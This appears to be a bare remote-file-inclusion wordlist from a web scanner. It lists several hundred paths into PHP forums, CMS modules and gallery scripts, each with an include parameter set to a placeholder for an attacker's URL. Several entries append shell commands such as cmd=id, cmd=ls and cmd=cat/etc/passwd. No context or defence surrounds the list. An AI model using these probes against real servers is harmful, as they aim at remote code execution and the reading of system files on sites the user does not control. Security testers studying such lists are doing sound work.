/files/carprss.php?CarpPath=XXpathXX
/files/compose-attach.php3?BSX_LIBDIR=XXpathXX
/files/compose-menu.php3?BSX_LIBDIR=XXpathXX
/files/compose-new.php3?BSX_LIBDIR=XXpathXX
/files/compose-send.php3?BSX_LIBDIR=XXpathXX
/files/folder-create.php3?BSX_LIBDIR=XXpathXX
/files/folder-delete.php3?BSX_LIBDIR=XXpathXX
/files/folder-empty.php3?BSX_LIBDIR=XXpathXX
/files/folder-rename.php3?BSX_LIBDIR=XXpathXX
/files/folders.php3?BSX_LIBDIR=XXpathXX
/files/login.php3?err=hack&BSX_HTXDIR=XXpathXX
/files/mainfile.php?page[path]=XXpathXX?&cmd=ls
/files/mbox-list.php3?BSX_LIBDIR=XXpathXX
/files/message-delete.php3?BSX_LIBDIR=XXpathXX
/files/message-forward.php3?BSX_LIBDIR=XXpathXX
/files/message-header.php3?BSX_LIBDIR=XXpathXX
/files/message-print.php3?BSX_LIBDIR=XXpathXX
/files/message-read.php3?BSX_LIBDIR=XXpathXX
/files/message-reply.php3?BSX_LIBDIR=XXpathXX
/files/message-replyall.php3?BSX_LIBDIR=XXpathXX
/files/message-search.php3?BSX_LIBDIR=XXpathXX
/findix/index.php?page=XXpathXX?&cmd=id
/fishcart_v3/fc_functions/fc_example.php?docroot=XXpathXX
/flushcmd/Include/editor/rich_files/class.rich.php?class_path=XXpathXX?
/fonctions/template.php?repphp=XXpathXX?
/fonctions_racine.php?chemin_lib=XXpathXX
/footer.inc.php?settings[footer]=XXpathXX
/footer.inc.php?tfooter=XXpathXX?
/footer.php?footer_file=XXpathXX
/footer.php?op[footer_body]=XXpathXX?
/form.php?path=XXpathXX?&cmd=pwd
/forum.php?cfg_file=1&fpath=XXpathXX?
/forum/forum.php?view=XXpathXX
/forum/forum82lib.php3?repertorylevel=XXpathXX?
/forum/gesfil.php?repertorylevel=XXpathXX?
/forum/lostpassword.php?repertorylevel=XXpathXX?
/forum/mail.php?repertorylevel=XXpathXX?
/forum/member.php?repertorylevel=XXpathXX?
/forum/message.php?repertorylevel=XXpathXX?
/forum/search.php?repertorylevel=XXpathXX?
/forum/track.php?path=XXpathXX
/frame.php?framefile=XXpathXX
/ftp.php?path_local=XXpathXX
/function.inc.php?path=XXpathXX
/function.php?adminfolder=XXpathXX
/function.php?gbpfad=XXpathXX
/functions.php?include_path=XXpathXX
/functions.php?pmp_rel_path=XXpathXX
/functions.php?s[phppath]=XXpathXX
/functions.php?set_path=XXpathXX?
/functions/form.func.php?GLOBALS[PTH][classes]=XXpathXX?
/functions/general.func.php?GLOBALS[PTH][classes]=XXpathXX?
/functions/groups.func.php?GLOBALS[PTH][classes]=XXpathXX?
/functions/js.func.php?GLOBALS[PTH][classes]=XXpathXX?
/functions/prepend_adm.php?SETS[path][physical]=XXpathXX
/functions/prepend_adm.php?SETS[path][physical]=XXpathXX?
/functions/sections.func.php?GLOBALS[PTH][classes]=XXpathXX?
/functions/users.func.php?GLOBALS[PTH][classes]=XXpathXX?
/functions_mod_user.php?phpbb_root_path=XXpathXX?&cmd=ls
/fusebox5.php?FUSEBOX_APPLICATION_PATH=XXpathXX
/galerie.php?config[root_ordner]=XXpathXX?cmd=id
/gallery/captionator.php?GALLERY_BASEDIR=XXpathXX
/gallery/lib/content.php?include=XXpathXX?cmd=ls
/gallery/theme/include_mode/template.php?galleryfilesdir=XXpathXX
/gallerypath/index.php?includepath=XXpathXX
/games.php?id=XXpathXX
/games.php?scoreid=XXpathXX
/gbook/includes/header.php?abspath=XXpathXX?
/gemini/page/forums/bottom.php?lang=XXpathXX?
/gen_m3u.php?phpbb_root_path=XXpathXX
/genepi.php?topdir=XXpathXX
/generate.php?ht_pfad=XXpathXX?
/gepi/gestion/savebackup.php?filename=XXpathXX&cmd=cat/etc/passwd
/gestArt/aide.php3?aide=XXpathXX?
/get_session_vars.php?path_to_smf=XXpathXX
/getpage.php?page=online&doc_path=XXpathXX
/global.php?abs_path=XXpathXX?
/gorum/dbproperty.php?appDirName=XXpathXX
/gpb/include/db.mysql.inc.php?root_path=XXpathXX?
/gpb/include/gpb.inc.php?root_path=XXpathXX?
/graph.php?DOCUMENT_ROOT=XXpathXX?
/gruppen.php?config[root_ordner]=XXpathXX?&cmd=id
/handlers/email/mod.listmail.php?_PM_[path][handle]=XXpathXX
/handlers/page/show.php?sous_rep=XXpathXX
/head.php?CONFIG[MWCHAT_Libs]=XXpathXX?
/header.inc.php?CssFile=XXpathXX
/header.php?path=XXpathXX
/header.php?wwwRoot=XXpathXX
/help.php?CONFIG[MWCHAT_Libs]=XXpathXX?
/help/index.php?show=XXpathXX
/help_text_vars.php?cmd=dir&PGV_BASE_DIRECTORY=XXpathXX
/helperfunction.php?includedir=XXpathXX
/hioxBannerRotate.php?hm=XXpathXX
/hioxRandomAd.php?hm=XXpathXX
/hioxstats.php?hm=XXpathXX
/hioxupdate.php?hm=XXpathXX
/home.php?a=XXpathXX
/home.php?page=XXpathXX
/home.php?pagina=XXpathXX
/home/www/images/doc/index2.php?type=XXpathXX
/home1.php?ln=XXpathXX
/home2.php?ln=XXpathXX
/hsList.php?subdir=XXpathXX?&cmd=ls
/htdocs/gmapfactory/params.php?gszAppPath=XXpathXX
/html/admin/modules/plugin_admin.php?_settings[pluginpath]=XXpathXX
/hu/modules/reg-new/modstart.php?mod_dir=XXpathXX?
/i_head.php?home=XXpathXX
/i_nav.php?home=XXpathXX
/iframe.php?file=XXpathXX
/image.php?url=XXpathXX???
/impex/ImpExData.php?systempath=XXpathXX
/import.php?bibtexrootrel=XXpathXX?
/importinfo.php?bibtexrootrel=XXpathXX?
/in.php?returnpath=XXpathXX
/inc/articles.inc.php?GLOBALS[CHEMINMODULES]=XXpathXX
/inc/config.inc.php?x[1]=XXpathXX
/inc/design.inc.php?dir[data]=XXpathXX
/inc/download_center_lite.inc.php?script_root=XXpathXX
/inc/formmail.inc.php?script_root=XXpathXX
/inc/gabarits.php?cfg_racine=XXpathXX
/inc/header.inc.php?ficStyle=XXpathXX
/inc/ifunctions.php?GLOBALS[phpQRootDir]=XXpathXX
/inc/inc.php?cfg_racine=XXpathXX?
/inc/indexhead.php?fileloc=XXpathXX?
/inc/irayofuncs.php?irayodirhack=XXpathXX?
/inc/libs/Smarty_Compiler.class.php?plugin_file=XXpathXX?
/inc/libs/core/core.display_debug_console.php?plugin_file=XXpathXX?
/inc/libs/core/core.load_plugins.php?plugin_file=XXpathXX?
/inc/libs/core/core.load_resource_plugin.php?plugin_file=XXpathXX?
/inc/libs/core/core.process_cached_inserts.php?plugin_file=XXpathXX?
/inc/libs/core/core.process_compiled_include.php?plugin_file=XXpathXX?
/inc/libs/core/core.read_cache_file.php?plugin_file=XXpathXX?
/inc/linkbar.php?cfile=XXpathXX?
/inc/login.php?pathCGX=XXpathXX
/inc/logingecon.php?pathCGX=XXpathXX
/inc/ltdialogo.php?pathCGX=XXpathXX
/inc/mtdialogo.php?pathCGX=XXpathXX
/inc/nuke_include.php?newsSync_enable_phpnuke_mod=1&newsSync_NUKE_PATH=XXpathXX?
/inc/prepend.inc.php?path=XXpathXX?
/inc/service.alert.inc.php?SPL_CFG[dirroot]=XXpathXX?
/inc/settings.php?inc_dir=XXpathXX
/inc/settings.ses.php?SPL_CFG[dirroot]=XXpathXX?
/inc/shows.inc.php?cutepath=XXpathXX?
/inc/sige_init.php?SYS_PATH=XXpathXX?
/inc_group.php?include_path=XXpathXX?
/inc_manager.php?include_path=XXpathXX?
/inc_newgroup.php.php?include_path=XXpathXX?
/inc_smb_conf.php?include_path=XXpathXX?
/inc_user.php?include_path=XXpathXX?
/include.php?_APP_RELATIVE_PATH=XXpathXX
/include.php?gorumDir=XXpathXX
/include.php?myng_root=XXpathXX
/include.php?path=psp/user.php&site=XXpathXX
/include.php?path[docroot]=XXpathXX
/include.php?sunPath=XXpathXX
/include/Beautifier/Core.php?BEAUT_PATH=XXpathXX
/include/HTML_oben.php?include_path=XXpathXX
/include/HTML_oben.php?include_path=XXpathXX?
/include/SQuery/gameSpy2.php?libpath=XXpathXX
/include/bbs.lib.inc.php?site_path=XXpathXX
/include/class_yapbbcooker.php?cfgIncludeDirectory=XXpathXX
/include/classes.php?INCLUDE_DIR=XXpathXX?
/include/client.php?INCLUDE_DIR=XXpathXX?
/include/cls_headline_prod.php?INCLUDE_PATH=XXpathXX
/include/cls_listorders.php?INCLUDE_PATH=XXpathXX
/include/cls_viewpastorders.php?INCLUDE_PATH=XXpathXX
/include/common.php?XOOPS_ROOT_PATH=XXpathXX
/include/common_functions.php?baros_path=XXpathXX?
/include/config.inc.php?racine=XXpathXX
/include/copyright.php?tsep_config[absPath]=XXpathXX?cmd=ls
/include/customize.php?l=XXpathXX&text=Hello%20World
/include/default_header.php?script_path=XXpathXX
/include/define.php?INC_DIR=XXpathXX?
/include/disp_form.php3?cfg_include_dir=XXpathXX?
/include/disp_smileys.php3?cfg_include_dir=XXpathXX?
/include/dom.php?path=XXpathXX
/include/dtd.php?path=XXpathXX
/include/editfunc.inc.php?NWCONF_SYSTEM[server_path]=XXpathXX?
/include/engine/content/elements/menu.php?CONFIG[AdminPath]=XXpathXX
/include/forms.php?INCLUDE_DIR=XXpathXX?
/include/global.php?pfad=XXpathXX
/include/header.php?cs_base_path=XXpathXX?
/include/html/nettools.popup.php?DIR=XXpathXX
/include/inc.foot.php?root=XXpathXX
/include/inc_ext/spaw/dialogs/table.php?spaw_root=XXpathXX
/include/inc_freigabe.php?include_path=XXpathXX?
/include/inc_freigabe1.php?include_path=XXpathXX?
/include/inc_freigabe3.php?include_path=XXpathXX?
/include/include_stream.inc.php?include_path=XXpathXX
/include/include_top.php?g_include=XXpathXX
/include/includes.php?include_path=XXpathXX
/include/index.php3?cfg_include_dir=XXpathXX?
/include/init.inc.php?G_PATH=XXpathXX
/include/issue_edit.php?INCLUDE_DIR=XXpathXX?
/include/lib/lib_slots.php?main_path=XXpathXX
/include/lib/lib_stats.php?main_path=XXpathXX?
/include/lib/lib_users.php?main_path=XXpathXX?
/include/little_news.php3?cfg_include_dir=XXpathXX?
/include/livre_include.php?no_connect=lol&chem_absolu=XXpathXX?
/include/loading.php?path_include=XXpathXX
/include/mail.inc.php?root=XXpathXX
/include/menu_builder.php?config[page_dir]=XXpathXX?
/include/misc/mod_2checkout/2checkout_return.inc.php?DIR=XXpathXX
/include/monitoring/engine/MakeXML.php?fileOreonConf=XXpathXX?
/include/parser.php?path=XXpathXX
/include/pear/IT.php?basepath=XXpathXX?
/include/pear/ITX.php?basepath=XXpathXX?
/include/pear/IT_Error.php?basepath=XXpathXX?
/include/phpxd/phpXD.php?appconf[rootpath]=XXpathXX?&cmd=id
/include/prodler.class.php?sPath=XXpathXX???
/include/scripts/export_batch.inc.php?DIR=XXpathXX
/include/scripts/run_auto_suspend.cron.php?DIR=XXpathXX
/include/scripts/send_email_cache.php?DIR=XXpathXX
/include/startup.inc.php?root_path=XXpathXX?
/include/themes/themefunc.php?myNewsConf[path][sys][index]=XXpathXX?
/include/timesheet.php?config[include_dir]=XXpathXX
/include/urights.php?CRM_inc=XXpathXX
/includes/admin_board2.php?phpbb_root_path=XXpathXX?ls
/includes/admin_logger.php?phpbb_root_path=XXpathXX?ls
/includes/adodb/back/adodb-postgres7.inc.php?ADODB_DIR=XXpathXX?
/includes/ajax_listado.php?urlModulo=XXpathXX
/includes/archive/archive_topic.php?phpbb_root_path=XXpathXX?
/includes/bbcb_mg.php?phpbb_root_path=XXpathXX?
/includes/begin.inc.php?PagePrefix=XXpathXX
/includes/blogger.php?path_prefix=XXpathXX
/includes/class/class_tpl.php?cache_file=XXpathXX?
/includes/class_template.php?quezza_root_path=XXpathXX
/includes/classes/pctemplate.php?pcConfig[smartyPath]=XXpathXX?cmd
/includes/common.inc.php?CONFIG[BASE_PATH]=XXpathXX
/includes/common.php?module_root_path=XXpathXX?
/includes/common.php?root=XXpathXX?
/includes/common.php?root_path=XXpathXX?
/includes/config.inc.php?racineTBS=XXpathXX
/includes/config/master.inc.php?fm_data[root]=XXpathXX?
/includes/connection.inc.php?PagePrefix=XXpathXX
/includes/dbal.php?eqdkp_root_path=XXpathXX
/includes/events.inc.php?PagePrefix=XXpathXX
/includes/footer.html.inc.php?tc_config[app_root]=XXpathXX?
/includes/footer.inc.php?PagePrefix=XXpathXX
/includes/footer.php?PHPGREETZ_INCLUDE_DIR=XXpathXX
/includes/functions.inc.php?sitepath=XXpathXX?
/includes/functions.php?location=XXpathXX
/includes/functions.php?phpbb_root_path=XXpathXX
/includes/functions.php?phpbb_root_path=XXpathXX?
/includes/functions/auto_email_notify.php?path_prefix=XXpathXX
/includes/functions/html_generate.php?path_prefix=XXpathXX
/includes/functions/master.inc.php?fm_data[root]=XXpathXX?
/includes/functions/validations.php?path_prefix=XXpathXX
/includes/functions_admin.php?phpbb_root_path=XXpathXX?
/includes/functions_install.php?vwar_root=XXpathXX
/includes/functions_kb.php?phpbb_root_path=XXpathXX?
/includes/functions_mod_user.php?phpbb_root_path=XXpathXX?
/includes/functions_portal.php?phpbb_root_path=XXpathXX?
/includes/functions_user_viewed_posts.php?phpbb_root_path=XXpathXX?
/includes/global.php?nbs=XXpathXX?
/includes/header.inc.php?PagePrefix=XXpathXX
/includes/header.inc.php?dateiPfad=XXpathXX
/includes/include_once.php?include_file=XXpathXX
/includes/init.php?includepath=XXpathXX?
/includes/iplogger.php?phpbb_root_path=XXpathXX?ls
/includes/kb_constants.php?module_root_path=XXpathXX
/includes/lang/language.php?path_to_root=XXpathXX
/includes/lib-account.inc.php?CONF_CONFIG_PATH=XXpathXX?
/includes/lib-group.inc.php?CONF_CONFIG_PATH=XXpathXX?
/includes/lib-log.inc.php?CONF_CONFIG_PATH=XXpathXX?
/includes/lib-mydb.inc.php?CONF_CONFIG_PATH=XXpathXX?
/includes/lib-template-mod.inc.php?CONF_CONFIG_PATH=XXpathXX?
/includes/lib-themes.inc.php?CONF_CONFIG_PATH=XXpathXX?
/includes/logger_engine.php?phpbb_root_path=XXpathXX
/includes/menuleft.inc.php?PagePrefix=XXpathXX
/includes/mkb.php?phpbb_root_path=XXpathXX?ls
/includes/morcegoCMS/adodb/adodb.inc.php?path=XXpathXX
/includes/morcegoCMS/morcegoCMS.php?fichero=XXpathXX
/includes/mx_common.php?module_root_path=XXpathXX?
/includes/openid/Auth/OpenID/BBStore.php?openid_root_path=XXpathXX
/includes/orderSuccess.inc.php?&glob=1&cart_order_id=1&glob[rootDir]=XXpathXX
/includes/pafiledb_constants.php?module_root_path=XXpathXX
/includes/pages.inc.php?PagePrefix=XXpathXX
/includes/phpdig/includes/config.php?relative_script_path=XXpathXX
/includes/profilcp_constants.php?module_root_path=XXpathXX?
/includes/settings.inc.php?approot=XXpathXX
/includes/template.php?myevent_path=XXpathXX
/includes/themen_portal_mitte.php?phpbb_root_path=XXpathXX
/includes/tumbnail.php?config[root_ordner]=XXpathXX?
/includes/usercp_register.php?phpbb_root_path=XXpathXX?
/includes/usercp_viewprofile.php?phpbb_root_path=XXpathXX?
/includes/xhtml.php?d_root=XXpathXX?
/index.php3?Application_Root=XXpathXX
/index.php?1=lol&PAGES[lol]=XXpathXX
/index.php?AML_opensite=XXpathXX
/index.php?AMV_openconfig=1&AMV_serverpath=XXpathXX
/index.php?CONFIG[MWCHAT_Libs]=XXpathXX?
/index.php?ConfigDir=XXpathXX
/index.php?DIR_PLUGINS=XXpathXX
/index.php?G_JGALL[inc_path]=XXpathXX%00
/index.php?HomeDir=XXpathXX
/index.php?Lang=AR&Page=XXpathXX
/index.php?Madoa=XXpathXX?
/index.php?RP_PATH=XXpathXX
/index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid=1&GLOBALS=&mosConfig_absolute_path=XXpathXX
/index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=XXpathXX
/index.php?abg_path=XXpathXX?
/index.php?abs_path=XXpathXX?
/index.php?adduser=true&lang=XXpathXX
/index.php?adodb=XXpathXX
/index.php?ads_file=XXpathXX
/index.php?arquivo=XXpathXX
/index.php?back=XXpathXX
/index.php?base==XXpathXX
/index.php?basePath=XXpathXX
/index.php?bibtexrootrel=XXpathXX?
/index.php?blog_dc_path=XXpathXX
/index.php?blog_theme=XXpathXX
/index.php?body=XXpathXX
/index.php?class_path=XXpathXX?
/index.php?classified_path=XXpathXX?
/index.php?cms=XXpathXX?
/index.php?config["sipssys"]=XXpathXX
/index.php?config[root_ordner]=XXpathXX?&cmd=id
/index.php?config[root_ordner]=XXpathXX?cmd=id
/index.php?config_atkroot=XXpathXX
/index.php?configuration=XXpathXX
/index.php?custom_admin_path=XXpathXX?
/index.php?dateiPfad=XXpathXX?&cmd=ls
/index.php?de=XXpathXX
/index.php?dept=XXpathXX
/index.php?do=XXpathXX
/index.php?exec=XXpathXX?
/index.php?ext=XXpathXX
/index.php?faq_path=XXpathXX?&cmd=id
/index.php?file_name[]=XXpathXX?
/index.php?file_path=XXpathXX?
/index.php?fileloc=XXpathXX
/index.php?from=XXpathXX
/index.php?func=XXpathXX?
/index.php?function=XXpathXX
/index.php?function=custom&custom=XXpathXX
/index.php?gOo=XXpathXX
/index.php?gen=XXpathXX
/index.php?get=XXpathXX
/index.php?home_name=XXpathXX
/index.php?ilang=XXpathXX?
/index.php?inc_dir=XXpathXX
/index.php?inc_dir=XXpathXX?
/index.php?includeDir=XXpathXX
/index.php?includeFooter=XXpathXX
/index.php?includesdir=XXpathXX
/index.php?insPath=XXpathXX
/index.php?lang=XXpathXX
/index.php?language=XXpathXX?
/index.php?language=en&main_page=XXpathXX
/index.php?lizge=XXpathXX?&cmd=ls
/index.php?lng=XXpathXX
/index.php?load=XXpathXX
/index.php?loadpage=XXpathXX
/index.php?main_tabid=1&main_content=XXpathXX
/index.php?may=XXpathXX
/index.php?middle=XXpathXX
/index.php?mode=XXpathXX
/index.php?modpath=XXpathXX
/index.php?module=PostWrap&page=XXpathXX
/index.php?mosConfig_absolute_path=XXpathXX
/index.php?news7["functions"]=XXpathXX
/index.php?news_include_path=XXpathXX
/index.php?open=XXpathXX
/index.php?option=com_custompages&cpage=XXpathXX?
/index.php?page=XXpathXX
/index.php?page=XXpathXX%00
/index.php?page=XXpathXX?
/index.php?pageXXpathXX
/index.php?page[path]=XXpathXX?&cmd=ls
/index.php?pagename=XXpathXX
/index.php?pager=XXpathXX
/index.php?pagina=XXpathXX?
/index.php?path_to_folder=XXpathXX?cmd=id
/index.php?pg=XXpathXX?
/index.php?phpbb_root_path=XXpathXX
/index.php?plugin=XXpathXX
/index.php?principal=XXpathXX
/index.php?proMod=XXpathXX
/index.php?proMod=XXpathXX?cmd
/index.php?project=XXpathXX
/index.php?repinc=XXpathXX?
/index.php?root_prefix=XXpathXX
/index.php?root_prefix=XXpathXX?
/index.php?section=XXpathXX
/index.php?site=XXpathXX
/index.php?site_path=XXpathXX
/index.php?styl[top]=XXpathXX??
/index.php?template=XXpathXX?
/index.php?templates_dir=XXpathXX?
/index.php?theme=XXpathXX
/index.php?themepath=XXpathXX?
/index.php?themesdir=XXpathXX
/index.php?this_path=XXpathXX?
/index.php?txt=XXpathXX
/index.php?up=XXpathXX
/index.php?url=XXpathXX
/index.php?w=XXpathXX
/index.php?way=XXpathXX??????????????
/index1.php?=XXpathXX
/index1.php?inc=XXpathXX
/index1.php?inhalt=XXpathXX
/index2.php?=XXpathXX
/index2.php?content=XXpathXX
/index2.php?s=XXpathXX
/index2.php?x=XXpathXX
/indexinfo.php?bibtexrootrel=XXpathXX?
/indexk.php?lib_path=XXpathXX?
/info.php?file=XXpathXX
/inhalt.php?dateien[news]=XXpathXX?
/init.php?API_HOME_DIR=XXpathXX
/init.php?scriptpath=XXpathXX?
/initialize.php?hmail_config[includepath]=XXpathXX&cmd=dir
/initiate.php?abs_path=XXpathXX
/install.php?_NE[AbsPath]=XXpathXX
/install.php?install_dir=XXpathXX
/install/config.php?path=XXpathXX
/install/di.php?pathtoserverdata=XXpathXX
/install/index.php?content_php=XXpathXX
/install/install3.php?database=none&cabsolute_path=XXpathXX
/integration/shortstat/configuration.php?SPL_CFG[dirroot]=XXpathXX?
/interact/modules/forum/embedforum.php?CONFIG[LANGUAGE_CPATH]=XXpathXX?
/interact/modules/scorm/lib.inc.php?CONFIG[BASE_PATH]=XXpathXX?
/interface/billing/billing_process.php?srcdir=XXpathXX?
/interface/editors/-custom.php?bField[bf_data]=XXpathXX
/interface/editors/custom.php?bField[bf_data]=XXpathXX
/interface/new/new_patient_save.php?srcdir=XXpathXX?
/intern/admin/?rootdir=XXpathXX
/intern/admin/other/backup.php?admin=1&rootdir=XXpathXX
/intern/clan/member_add.php?rootdir=XXpathXX
/intern/config/forum.php?rootdir=XXpathXX
/intern/config/key_2.php?rootdir=XXpathXX
/ip.inc.php?type=1&cgipath=XXpathXX
/ipeer_site/?page=XXpathXX?
/joinus.php?vwar_root=XXpathXX
/joinus.php?vwar_root=XXpathXX?&cmd=ls
/joomla_path/administrator/components/com_x-shop/admin.x-shop?mosConfig_absolute_path=XXpathXX?
/joomla_path/components/com_articles.php?absolute_path=XXpathXX?
/js/bbcodepress/bbcode-form.php?BBCODE_path=XXpathXX
/js/wptable-tinymce.php?ABSPATH=XXpathXX
/jscript.php?my_ms[root]=XXpathXX?
/kernel/class/ixpts.class.php?IXP_ROOT_PATH=XXpathXX
/kernel/loadkernel.php?installPath=XXpathXX
/kmitaadmin/kmitam/htmlcode.php?file=XXpathXX?
/ktmlpro/includes/ktedit/toolbar.php?dirDepth=XXpathXX
/lang/leslangues.php?fichier=XXpathXX
/lang_english/lang_main_album.php?phpbb_root_path=XXpathXX?a=
/language/lang_english/lang_activity.php?phpbb_root_path=XXpathXX
/language/lang_english/lang_admin_album.php?phpbb_root_path=XXpathXX?a=
/language/lang_german/lang_admin_album.php?phpbb_root_path=XXpathXX?a=
/language/lang_german/lang_main_album.php?phpbb_root_path=XXpathXX?a=
/latestposts.php?forumspath=XXpathXX
/latex.php?bibtexrootrel=XXpathXX?
/layout/default/params.php?gConf[dir][layouts]=XXpathXX?
/ldap/authldap.php?includePath=XXpathXX
/learnPath/include/scormExport.inc.php?includePath=XXpathXX
/lib.editor.inc.php?sys_path=XXpathXX?
/lib/Loggix/Module/Calendar.php?pathToIndex=XXpathXX
/lib/Loggix/Module/Comment.php?pathToIndex=XXpathXX
/lib/Loggix/Module/Rss.php?pathToIndex=XXpathXX
/lib/Loggix/Module/Trackback.php?pathToIndex=XXpathXX
/lib/action/rss.php?lib=XXpathXX?
/lib/activeutil.php?set[include_path]=XXpathXX?
/lib/addressbook.php?GLOBALS[basedir]=XXpathXX
/lib/armygame.php?libpath=XXpathXX
/lib/authuser.php?root=XXpathXX
/lib/base.php?BaseCfg[BaseDir]=XXpathXX
/lib/connect.php?root=XXpathXX
/lib/connected_users.lib.php3?ChatPath=XXpathXX
/lib/connected_users.lib.php3?ChatPath=XXpathXX?
/lib/db/mysql.class.php?root=XXpathXX
/lib/db/postgres.class.php?root=XXpathXX
/lib/functions.php?DOC_ROOT=XXpathXX
/lib/googlesearch/GoogleSearch.php?APP[path][lib]=XXpathXX?
/lib/header.php?DOC_ROOT=XXpathXX
/lib/language.php?_LIB_DIR=XXpathXX
/lib/live_status.lib.php?ROOT=XXpathXX
/lib/misc.php?root=XXpathXX
/lib/nl/nl.php?g_strRootDir=XXpathXX
/lib/obj/collection.class.php?GLOBALS[application][app_root]=XXpathXX
/lib/obj/content_image.class.php?GLOBALS[application][app_root]=XXpathXX
/lib/pcltar.lib.php?g_pcltar_lib_dir=XXpathXX
/lib/pcltrace.lib.php?g_pcltar_lib_dir=XXpathXX
/lib/rs.php?rootpath=XXpathXX
/lib/selectlang.php?BBC_LANGUAGE_PATH=XXpathXX
/lib/smarty/SmartyFU.class.php?system[smarty][dir]=XXpathXX?
/lib/static/header.php?set_menu=XXpathXX
/lib/tpl.inc.php?conf[classpath]=XXpathXX
/libraries/comment/postComment.php?path[cb]=XXpathXX?a=
/libraries/database.php?path=XXpathXX???
/libraries/lib-remotehost.inc.php?phpAds_geoPlugin=XXpathXX
/libraries/pcl/pcltar.php?g_pcltar_lib_dir=XXpathXX
/library/authorize.php?login_form=XXpathXX?
/library/translation.inc.php?GLOBALS[srcdir]=XXpathXX?
/libs/db.php?path_local=XXpathXX
/libs/ftp.php?path_local=XXpathXX
/libs/lom.php?ETCDIR=XXpathXX
/libsecure.php?abs_path=XXpathXX?
/license.php?CONFIG[MWCHAT_Libs]=XXpathXX?
/link_main.php?phpbb_root_path=XXpathXX
/linkadmin.php?page=XXpathXX?
/linksnet_newsfeed/linksnet_linkslog_rss.php?dirpath_linksnet_newsfeed=XXpathXX?
/list.php?phpbb_root_path=XXpathXX
/lms_path/modules/userpanel.php?CONFIG[directories][userpanel_dir]=XXpathXX
/lms_path/modules/welcome.php?_LIB_DIR=XXpathXX
/load_lang.php?_SERWEB[configdir]=XXpathXX
/load_lang.php?_SERWEB[serwebdir]=XXpathXX
/load_phplib.php?_PHPLIB[libdir]=XXpathXX
/loader.php?GLOBALS=XXpathXX
/local/lib/lcUser.php?LIBDIR=XXpathXX?
/log.php?bibtexrootrel=XXpathXX?
/login.php3?cl_headers=XXpathXX
/login.php?base_dir=XXpathXX
/login.php?blog_theme=XXpathXX
/login.php?langfile=XXpathXX
/login.php?pachtofile=XXpathXX
/login.php?srcdir=XXpathXX?
/login.php?value=XXpathXX??
/lovecms/install/index.php?step=XXpathXX?
/m2f/m2f_cron.php?m2f_root_path=XXpathXX
/m2f/m2f_forum.php?m2f_root_path=XXpathXX
/m2f/m2f_mailinglist.php?m2f_root_path=XXpathXX
/m2f/m2f_phpbb204.php?m2f_root_path=XXpathXX
/maguz.php?site=XXpathXX
/mail/childwindow.inc.php?form=XXpathXX?
/mail/content/fnc-readmail3.php?__SOCKETMAIL_ROOT=XXpathXX?
/mail_this_entry/mail_autocheck.php?pm_path=XXpathXX?&cmd=ls
/main.inc.php?pathtoscript=XXpathXX
/main.php?config[search_disp]=true&include_dir=XXpathXX
/main.php?id=XXpathXX
/main.php?include_path=XXpathXX?
/main.php?pageURL=XXpathXX
/main.php?pagina=XXpathXX
/main/forum/komentar.php?site_path=XXpathXX
/main/main.php?pi=XXpathXX
/main/ppcbannerclick.php?INC=XXpathXX?
/main/ppcclick.php?INC=XXpathXX?
/main_prepend.php?_SERWEB[functionsdir]=XXpathXX
/mainpage.php?docroot=XXpathXX?cmd
/mamboleto.php?mosConfig_absolute_path=XXpathXX
/mambots/editors/path/jscripts/tiny_mce/plugins/preview/preview.php?mosConfig_absolute_path=XXpathXX
/manage_songs.php?foing_root_path=XXpathXX
/manager/admin/index.php?MGR=XXpathXX
/manager/admin/p_ins.php?MGR=XXpathXX
/manager/admin/u_ins.php?MGR=XXpathXX
/manager/articles.php?_PX_config[manager_path]=XXpathXX
/manager/static/view.php?propID=0&INC=XXpathXX
/master.php?root_path=XXpathXX
/mcNews/admin/header.php?skinfile=XXpathXX
/mcf.php?content=XXpathXX
/mcnews/admin/install.php?l=XXpathXX
/mediagallery/public_html/maint/ftpmedia.php?_MG_CONF[path_html]=XXpathXX
/member.php?vwar_root=XXpathXX
/member/usercp_menu.php?script_folder=XXpathXX
/members/index.php?INC=XXpathXX?
/members/registration.php?INC=XXpathXX?
/members_help.php?hlp=XXpathXX?
/membres/membreManager.php?include_path=XXpathXX?
/menu.php3?cl_headers=XXpathXX
/menu.php?functions_file=XXpathXX
/mep/frame.php?chem=XXpathXX?
/microcms/includes/file_manager/special.php?fm_includes_special=XXpathXX
/middle.php?file=XXpathXX
/migrateNE2toNE3.php?_NE[AbsPath]=XXpathXX
/mindmeld/acweb/admin_index.php?MM_GLOBALS[home]=XXpathXX?
/mindmeld/include/ask.inc.php?MM_GLOBALS[home]=XXpathXX?
/mindmeld/include/learn.inc.php?MM_GLOBALS[home]=XXpathXX?
/mindmeld/include/manage.inc.php?MM_GLOBALS[home]=XXpathXX?
/mindmeld/include/mind.inc.php?MM_GLOBALS[home]=XXpathXX?
/mindmeld/include/sensory.inc.php?MM_GLOBALS[home]=XXpathXX?
/mini-pub.php/front-end/img.php?sFileName=XXpathXX?
/minimal/wiki.php?page=XXpathXX?
/misc/function.php3?path=XXpathXX?
/mitglieder.php?config[root_ordner]=XXpathXX?&cmd=id
/mkportal/include/user.php?MK_PATH=XXpathXX
/mkportal/include/user.php?MK_PATH=XXpathXX?
/mod/authent.php4?rootpath=XXpathXX
/mod/image/index.php?config[pathMod]=XXpathXX
/mod/liens/index.php?config[pathMod]=XXpathXX
/mod/liste/index.php?config[pathMod]=XXpathXX
/mod/special/index.php?config[pathMod]=XXpathXX
/mod/texte/index.php?config[pathMod]=XXpathXX
/mod_membre/inscription.php?chemin=XXpathXX?
/mod_phpalbum/sommaire_admin.php?chemin=XXpathXX?
/modernbill/include/html/config.php?DIR=XXpathXX
/modifyform.html?code=XXpathXX
/mods/business_functions.php?GALLERY_BASEDIR=XXpathXX
/mods/config/load.inc.php?moddir=XXpathXX?
/mods/http/load.inc.php?moddir=XXpathXX?
/mods/ui_functions.php?GALLERY_BASEDIR=XXpathXX
/module/forum/forum.php?fd=XXpathXX=';
/module/forum/main.php?id=1&main_dir=XXpathXX?&
/modules.php?name=XXpathXX&file=article&sid=2
/modules/4nAlbum/public/displayCategory.php?basepath=XXpathXX
/modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=XXpathXX
/modules/Calendar/admin/update.php?calpath=XXpathXX?
/modules/Calendar/calendar.php?calpath=XXpathXX?
/modules/Calendar/scheme.php?calpath=XXpathXX?
/modules/Discipline/CategoryBreakdownTime.php?FocusPath=XXpathXX
